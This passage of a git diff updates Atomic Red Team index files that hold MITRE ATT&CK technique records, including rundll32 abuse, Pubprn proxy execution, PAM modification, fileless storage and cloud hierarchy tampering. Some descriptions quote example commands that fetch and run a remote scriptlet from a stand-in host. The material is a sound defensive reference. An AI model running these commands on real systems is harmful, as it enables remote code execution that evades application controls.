         such as a removable drive. In certain circumstances, such as an air-gapped
@@ -61492,12 +62358,10 @@ exfiltration:
       x_mitre_system_requirements:
       - Presence of physical medium or device
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1048.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:39:25.476Z'
       name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
         Non-C2 Protocol'
       description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -61561,6 +62425,5 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048.003
     atomic_tests: []
diff --git a/atomics/Indexes/saas-index.yaml b/atomics/Indexes/saas-index.yaml
index 1ac83b1d66..44ed384822 100644
--- a/atomics/Indexes/saas-index.yaml
+++ b/atomics/Indexes/saas-index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -97,13 +97,11 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests: []
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -166,21 +164,27 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-04T15:05:25.388Z'
       name: Fileless Storage
       description: "Adversaries may store data in \"fileless\" formats to conceal
         malicious activity from defenses. Fileless storage can be broadly defined
         as any format other than a file. Common examples of non-volatile fileless
-        storage include the Windows Registry, event logs, or WMI repository.(Citation:
-        Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
-        in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
+        storage in Windows systems include the Windows Registry, event logs, or WMI
+        repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+        Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+        and `/var/lock` may also be considered fileless storage, as files written
+        to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+        Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+        2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+        behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
         and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
         data storage may remain undetected by anti-virus and other endpoint security
-        tools that can only access specific file formats from disk storage.\n\nAdversaries
+        tools that can only access specific file formats from disk storage. Leveraging
+        fileless storage may also allow adversaries to bypass the protections offered
+        by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
         may use fileless storage to conceal various types of stored data, including
         payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
         and collected data not yet exfiltrated from the victim (e.g., [Local Data
@@ -200,6 +204,7 @@ defense-evasion:
       - Mark Wee
       - Simona David
       - Xavier Rousseau
+      - Vito Alfano, Group-IB
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -207,10 +212,12 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.0'
+      - Linux
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'WMI: WMI Creation'
+      - 'Process: Process Creation'
       type: attack-pattern
       id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
       created: '2023-03-23T19:55:25.546Z'
@@ -220,6 +227,14 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1027/011
         external_id: T1027.011
+      - source_name: Aquasec Muhstik Malware 2024
+        description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+          Queuing Services Applications. Retrieved September 24, 2024."
+        url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+      - source_name: Elastic Binary Executed from Shared Memory Directory
+        description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+          Retrieved September 24, 2024.
+        url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
       - source_name: SecureList Fileless
         description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
           Retrieved March 23, 2023.
@@ -228,15 +243,22 @@ defense-evasion:
         description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
           23, 2023.
         url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+      - source_name: Sysdig Fileless Malware 23022
+        description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+          September 24, 2024.
+        url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+      - source_name: Akami Frog4Shell 2024
+        description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+          Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+        url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.011:
     technique:
-      modified: '2023-08-14T15:35:28.965Z'
+      modified: '2024-10-14T13:14:43.083Z'
       name: 'Signed Binary Proxy Execution: Rundll32'
       description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
         code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
@@ -247,10 +269,10 @@ defense-evasion:
         also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
         Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code>
         and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes
-        rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
-        be used to execute scripts such as JavaScript. This can be done using a syntax
-        similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
-        \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
+        rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+        can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+        scripts such as JavaScript. This can be done using a syntax similar to this:
+        <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
         \ This behavior has been seen used by malware such as Poweliks. (Citation:
         This is Security Command Line Confusion)\n\nAdversaries may also attempt to
         obscure malicious code from analysis by abusing the manner in which rundll32.exe
@@ -286,7 +308,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -316,7 +338,7 @@ defense-evasion:
       - source_name: This is Security Command Line Confusion
         description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
           Retrieved March 5, 2018.
-        url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+        url: https://www.stormshield.com/news/poweliks-command-line-confusion/
       - source_name: Github NoRunDll
         description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
           2021.
@@ -327,9 +349,8 @@ defense-evasion:
         url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.011
     atomic_tests: []
   T1027.009:
@@ -419,49 +440,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -476,20 +458,57 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1578.004:
@@ -518,7 +537,7 @@ defense-evasion:
         url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
         description: Google. (2019, October 7). Restoring and deleting persistent
           disk snapshots. Retrieved October 8, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-08T10:33:02.128Z'
       name: Revert Cloud Instance
       description: |-
         An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
@@ -545,8 +564,6 @@ defense-evasion:
       - 'Instance: Instance Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.012:
     technique:
@@ -588,7 +605,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.002:
     technique:
@@ -666,7 +682,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.002
     atomic_tests: []
   T1216.001:
@@ -703,7 +718,7 @@ defense-evasion:
         Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second <code>script:</code> parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct</code>. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
 
         In later versions of Windows (10+), <code>PubPrn.vbs</code> has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to <code>LDAP://</code>, vice the <code>script:</code> moniker which could be used to reference remote code via HTTP(S).
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:55:35.817Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Script Proxy Execution: Pubprn'
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -722,7 +737,6 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216.001
     atomic_tests: []
   T1574.007:
@@ -812,7 +826,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1006:
     technique:
@@ -870,12 +883,87 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1006
     atomic_tests: []
+  T1666:
+    technique:
+      modified: '2024-09-25T16:15:41.224Z'
+      name: Modify Cloud Resource Hierarchy
+      description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
+        (IaaS) environments in order to evade defenses.  \n\nIaaS environments often
+        group resources into a hierarchy, enabling improved resource management and
+        application of policies to relevant groups. Hierarchical structures differ
+        among cloud providers. For example, in AWS environments, multiple accounts
+        can be grouped under a single organization, while in Azure environments, multiple
+        subscriptions can be grouped under a single management group.(Citation: AWS
+        Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
+        delete, or otherwise modify resource groups within an IaaS hierarchy. For
+        example, in Azure environments, an adversary who has gained access to a Global
+        Administrator account may create new subscriptions in which to deploy resources.
+        They may also engage in subscription hijacking by transferring an existing
+        pay-as-you-go subscription from a victim tenant to an adversary-controlled
+        tenant. This will allow the adversary to use the victim’s compute resources
+        without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+        2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
+        adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+        API, causing the account to be severed from the AWS Organization to which
+        it was tied and removing any Service Control Policies, guardrails, or restrictions
+        imposed upon it by its former Organization. Alternatively, adversaries may
+        call the `CreateAccount` API in order to create a new account within an AWS
+        Organization. This account will use the same payment methods registered to
+        the payment account but may not be subject to existing detections or Service
+        Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      type: attack-pattern
+      id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+      created: '2024-09-25T14:16:19.234Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1666
+        external_id: T1666
+      - source_name: AWS Organizations
+        description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+          Retrieved September 25, 2024.
+        url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Microsoft Subscription Hijacking 2022
+        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+      - source_name: Microsoft Azure Resources
+        description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+          effectively. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+      - source_name: Microsoft Peach Sandstorm 2023
+        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+          password spray campaigns enable intelligence collection at high-value targets.
+          Retrieved September 18, 2023.
+        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.008:
     technique:
-      modified: '2023-10-16T16:41:53.957Z'
+      modified: '2024-10-15T15:56:27.592Z'
       name: 'Hide Artifacts: Email Hiding Rules'
       description: |-
         Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
@@ -901,11 +989,10 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -950,12 +1037,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.008
     atomic_tests: []
   T1027.013:
     technique:
-      modified: '2024-04-19T04:03:07.164Z'
+      modified: '2024-10-15T16:32:45.108Z'
       name: Encrypted/Encoded File
       description: "Adversaries may encrypt or encode files to obfuscate strings,
         bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -1026,11 +1112,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:50.568Z'
       name: Rootkit
       description: "Adversaries may use rootkits to hide the presence of programs,
         files, network connections, services, drivers, and other system components.
@@ -1098,7 +1183,6 @@ defense-evasion:
         url: https://en.wikipedia.org/wiki/Rootkit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1014
     atomic_tests: []
   T1036.007:
@@ -1129,7 +1213,7 @@ defense-evasion:
         url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
         description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
           with double extension?. Retrieved July 27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:09:59.588Z'
       name: 'Masquerading: Double File Extension'
       description: "Adversaries may abuse a double extension in the filename as a
         means of masquerading the true file type. A file name may include a secondary
@@ -1166,13 +1250,11 @@ defense-evasion:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1036.007
     atomic_tests: []
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -1273,7 +1355,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests: []
   T1548.003:
@@ -1304,7 +1385,7 @@ defense-evasion:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -1338,13 +1419,11 @@ defense-evasion:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests: []
   T1578:
     technique:
-      modified: '2023-09-05T20:45:22.041Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Modify Cloud Compute Infrastructure
       description: |-
         An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -1396,12 +1475,11 @@ defense-evasion:
       - source_name: Mandiant M-Trends 2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
           2020.
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542.001:
     technique:
@@ -1481,12 +1559,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -1505,7 +1582,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -1519,7 +1595,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -1546,8 +1621,8 @@ defense-evasion:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
